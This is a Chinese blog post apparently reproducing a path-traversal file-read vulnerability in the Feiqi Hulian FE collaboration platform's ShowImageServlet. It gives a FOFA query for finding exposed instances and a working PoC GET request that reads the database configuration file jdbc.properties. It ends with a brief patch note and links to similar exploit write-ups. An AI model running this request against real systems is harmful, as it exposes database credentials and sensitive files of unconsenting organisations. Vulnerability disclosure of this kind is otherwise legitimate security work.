飞企互联FE业务协作平台 ShowImageServlet 文件读取漏洞复现

已于 2023-12-21 17:10:26 修改
阅读量1k 收藏 10
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全
于 2023-12-21 11:32:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135126799
版权
本文介绍了飞企互联FE业务协作平台的ShowImageServlet文件读取漏洞,详细阐述了漏洞概述、复现环境及复现过程,并提供了修复建议。攻击者能利用此漏洞读取系统关键文件,造成安全隐患。
摘要由CSDN通过智能技术生成

0x01 产品简介

飞企互联FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。

0x02 漏洞概述

飞企互联 FE 业务协作平台ShowImageServlet接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:app="飞企互联-FE企业运营管理平台"

0x04 漏洞复现

PoC

GET /servlet/ShowImageServlet?imagePath=../web/fe.war/WEB-INF/classes/jdbc.properties&print HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

读取数据库配置 

0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:

https://www.flyrise.cn/

0xSecl
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
【0day】复现飞企互联 FE业务协作平台 某接口任意文件读取漏洞
记录并分享学习安全的知识点..
10-16 422
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台某接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
飞企互联FE业务协作平台ShowImageServlet接口任意文件读取漏洞
xiaokp7的博客
09-13 779
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
飞企互联-FE企业运营管理平台uploadAttachmentServlet存在任意文件上传漏洞
qq_36334672的博客
03-29 338
飞企互联-FE企业运营管理平台 uploadAttachmentServlet存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件,任意执行代码,获取服务器权限,进而控制整个 web 服务器。
漏洞复现飞企互联-FE企业运营管理平台 uploadAttachmentServlet文件上传漏洞
weixin_54799594的博客
07-13 1856
漏洞复现记录
漏洞复现飞企互联FE企业运营管理平台 uploadAttachmentServlet 任意文件上传漏洞
https://blog.echo234.cn/
03-25 766
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联FE业务协作平台uploadAttachmentServlet 任意文件上传漏洞,攻击者可通过该漏洞获取服务器权限。
漏洞复现飞企互联-FE企业运营管理平台——uploadAttachmentServlet——文件上传
LongL_GuYu的博客
07-10 956
飞企互联-FE企业运营管理平台是一个基于云计算、智能化、大数据、物联网、移动互联网等技术支撑的云工作台。其`uploadAttachmentServlet`存在文件上传漏洞,导致恶意攻击者可以上传恶意后门、木马等,从而获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
飞企互联-FE企业运营管理平台管理员权限登录绕过漏洞复现
qq_39573664的博客
12-29 845
飞企互联FE企业运营管理平台存在一个潜在的安全漏洞,涉及到2.ln接口的登录绕过问题。未经授权的攻击者可以通过构造恶意的URL访问页面,直接进入后台管理页面,获取敏感信息。这种漏洞可能为攻击者提供了进一步控制整个服务器的机会,对系统的安全性构成潜在威胁。
飞企互联企业运营管理平台存在任意文件读取
qq_36334672的博客
01-24 374
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台飞企互联 FE 业务协作平台存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。
FE业务协作平台后台开发工具操作手册
06-17
FE业务协作平台后台开发工具操作手册,详细描述了FE业务协作平台后台开发工具使用
飞企互联FE业务协作平台文件读取漏洞
weixin_43567873的博客
03-07 87
飞企互联FE业务协作平台文件读取漏洞
专题资料(2021-2022年)FE企业运营管理平台V65发版说明v1.doc
10-07
专题资料
飞企互联-FE企业运营管理平台 parseTree SQL注入漏洞复现
0xSec
02-23 480
飞企互联-FE企业运营管理平台 parseTree 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
漏洞复现--飞企互联FE业务协作平台ShowImageServlet任意文件读取
qq_53003652的博客
11-20 395
FE办公协作平台是基于业务应用模型驱动开发技术与工作流的协作技术、采用了面向业务部件技术,实现应用开发、运行、管理、维护的信息管理平台。该产品ShowImageServlet 文件存在任意文件读取
【1day】复现飞企互联 FE业务协作平台 ShowImageServlet 接口任意文件读取漏洞
记录并分享学习安全的知识点..
08-22 532
飞企互联Feiqi Hulian)是一家提供FE(Front End)业务协作平台的公司。FE业务协作平台是针对前端开发团队而设计的工具,旨在提高团队协作效率、优化工作流程,并支持团队成员之间的沟通和协作飞企互联 FE业务协作平台 ShowImageServlet 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
致远互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞
Keepb1ue的博客
12-25 2071
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。致远互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息。2.部署Web应用防火墙,对数据库操作进行监控。app=“致远互联-FE”1.升级至系统最新版本。
致远互联FE协作办公平台 editflow_manager.jsp 存在SQL注入漏洞
3tefanie丶zhou的博客
12-15 507
【每个结局伤感的故事,都有个温暖的开头,每年的大雪隆冬,都是从春暖花开中走来。】
用友OA漏洞复现手册
热门推荐
1stPeak's Blog
04-20 1万+
用友OA漏洞复现手册 前言:用友OA产品漏洞复现笔记,供自己使用,不定期更新
TCP/IP网络编程:第18章聊天室
最新发布
weixin_57112913的博客
09-02 172
其他两个客户端也是类似的,分别发送Hi Yoon反正就是基本上实现了一个群聊的功能。客户端:发送信息给服务端,接收服务端传来的其他客户的信息。服务端:负责连接客户端,转发客户端的信息给其他客户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值